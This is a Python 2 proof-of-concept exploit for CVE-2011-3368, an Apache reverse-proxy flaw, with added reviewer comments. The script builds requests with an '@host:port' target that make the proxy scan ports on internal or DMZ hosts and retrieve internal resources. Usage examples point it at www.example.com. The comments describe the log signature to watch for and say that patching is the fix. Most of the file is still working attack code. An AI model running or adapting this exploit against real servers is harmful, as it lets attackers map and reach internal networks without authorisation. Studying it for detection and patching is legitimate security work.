#!/usr/bin/env python
import socket
import string
import getopt, sys

# Python 2 script (print statements, string.find): it does not run unchanged
# on Python 3.
#
# What the script does, for readers reviewing it from the defensive side:
# every probe is a single HTTP request whose request-line target is
# "<url>@<internal_target>:<internal_port>/<resource>" with "Host:" set to
# the Apache host (see send_request). That "@host:port" segment inside the
# request target is the distinguishing feature to look for in access logs or
# proxy/WAF rules. NOTE(review): the underlying weakness (CVE-2011-3368) is in
# how the proxy handles such targets; remediation is patching/configuring the
# proxy itself, nothing in this script changes that.

# Default TCP ports probed on the internal host when -e is not given (see the
# module-level run at the bottom). Each value is passed through str(), so the
# leading 0 is sent literally as ":0" in the request line.
known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]

def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):
    """Send one probe through the Apache host and return the raw reply.

    Args:
        url: path on the Apache host that the request target starts with.
        apache_target: hostname/IP the TCP connection is opened to; also
            used verbatim as the Host header.
        apache_port: port on apache_target, as a string (int() is applied
            inside the try block).
        internal_target: host name placed after the "@" in the request target.
        internal_port: port placed after "host:" in the request target, as a
            string.
        resource: path appended after "host:port/".

    Returns:
        Up to the first 4096 bytes of whatever the server sends back, or ""
        if anything at all goes wrong (see the bare except below).
    """
    get = "GET " + url + "@" + internal_target + ":" + internal_port +"/" + resource + " HTTP/1.1\r\n"
    get = get + "Host: " + apache_target + "\r\n\r\n"
    remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # 3-second cap on connect/send/recv; a timeout lands in the except branch
    # and is therefore reported by scan_host as a "Filtered" port.
    remoteserver.settimeout(3)
    try:
        remoteserver.connect((apache_target, int(apache_port)))
        remoteserver.send(get)
        # Only one recv: a response longer than 4096 bytes is truncated.
        return remoteserver.recv(4096)
    except:
        # NOTE(review): the bare except also swallows a ValueError from a
        # non-numeric apache_port and even KeyboardInterrupt, so all such
        # failures are indistinguishable from a filtered port. The socket is
        # never closed explicitly on either path; cleanup relies on GC.
        return ""

def get_banner(result):
    """Return the part of *result* after the first "\\r\\n\\r\\n" (the HTTP body).

    If no blank line is present, string.find returns -1 and the slice starts
    at index 3, so the first three characters are silently dropped instead of
    an error being raised.
    """
    return result[string.find(result, "\r\n\r\n")+4:]

def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):
    """Probe each port in *tested_ports* via send_request and print a verdict.

    Classification is a substring search over the whole reply (not anchored to
    the status line):
      - "HTTP/1.1 200", "HTTP/1.1 30" (any 30x redirect) or "HTTP/1.1 502"
        anywhere in the reply -> "Open", and the reply body is printed;
      - empty reply (which is also what send_request returns on any
        exception, including timeouts) -> "Filtered";
      - anything else -> "Closed".
    Prints the banner first; returns None.
    """
    print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
    for port in tested_ports:
        # Ports may arrive as ints (known_ports) or a string (-e); normalise.
        port = str(port)
        result = send_request(url, apache_target, apache_port, internal_target, port, resource)
        if string.find(result,"HTTP/1.1 200")!=-1 or \
           string.find(result,"HTTP/1.1 30")!=-1 or \
           string.find(result,"HTTP/1.1 502")!=-1:
            print "- Open port: " + port + "/TCP"
            # Body of the (at most 4096-byte) reply, as returned by get_banner.
            print get_banner(result)
        elif len(result)==0:
            print "- Filtered port: " + port + "/TCP"
        else:
            print "- Closed port: " + port + "/TCP"

def usage():
    """Print the command-line help text to stdout."""
    print
    print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
    print "http://www.secforce.co.uk"
    print
    print "usage():"
    print "python apache_scan.py [options]"
    print
    print " [options]"
    print " -r: Remote Apache host"
    print " -p: Remote Apache port (default is 80)"
    print " -u: URL on the remote web server (default is /)"
    print " -d: Host in the DMZ (default is 127.0.0.1)"
    print " -e: Port in the DMZ (enables 'single port scan')"
    print " -g: GET request to the host in the DMZ (default is /)"
    print " -h: Help page"
    print
    print "examples:"
    print " - Port scan of the remote host"
    print " python apache_scan.py -r www.example.com -u /images/test.gif"
    print " - Port scan of a host in the DMZ"
    print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local"
    print " - Retrieve a resource from a host in the DMZ"
    print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html"
    print

def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
    """Print the run header (target, port, internal host, port list, resource).

    *url* is accepted for signature symmetry with scan_host but is not
    printed. apache_port is concatenated as-is, so it must be a string.
    """
    print
    print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
    print "http://www.secforce.co.uk"
    print
    print " [+] Target: " + apache_target
    print " [+] Target port: " + apache_port
    print " [+] Internal host: " + internal_target
    print " [+] Tested ports: " + str(tested_ports)
    print " [+] Internal resource: " + resource
    print

def main():
    """Parse sys.argv into the module-level configuration globals.

    Overwrites url, apache_target, apache_port, internal_target, internal_port
    and resource (all declared global below); the defaults are assigned at
    module level before main() is called. Exits with status 2 on a getopt
    error, on -h/--help, or when -r was not supplied. When an option is
    repeated, the last occurrence wins.
    """
    global apache_target
    global apache_port
    global url
    global internal_target
    global internal_port
    global resource
    try:
        opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])
    except getopt.GetoptError:
        usage()
        sys.exit(2)
    # NOTE(review): nothing inside this loop calls getopt, so the matching
    # except clause below can never fire; sys.exit raises SystemExit, which it
    # does not catch either.
    try:
        for o, a in opts:
            if o in ("-h", "--help"):
                usage()
                sys.exit(2)
            if o == "-u":
                url=a
            if o == "-r":
                apache_target=a
            if o == "-p":
                apache_port=a
            if o == "-d":
                internal_target = a
            if o == "-e":
                internal_port=a
            if o == "-g":
                resource=a
    except getopt.GetoptError:
        usage()
        sys.exit(2)
    # -r is the only mandatory option.
    if apache_target == "":
        usage()
        sys.exit(2)

# Module-level run: defaults first (main() rebinds them through `global`),
# then argument parsing, then the scan.
url = "/"
apache_target = ""
apache_port = "80"
internal_target = "127.0.0.1"
internal_port = ""
resource = "/"
main()
# -e given: probe that single port (kept as the string supplied); otherwise
# walk the default list.
if internal_port!="":
    tested_ports = [internal_port]
else:
    tested_ports = known_ports
scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)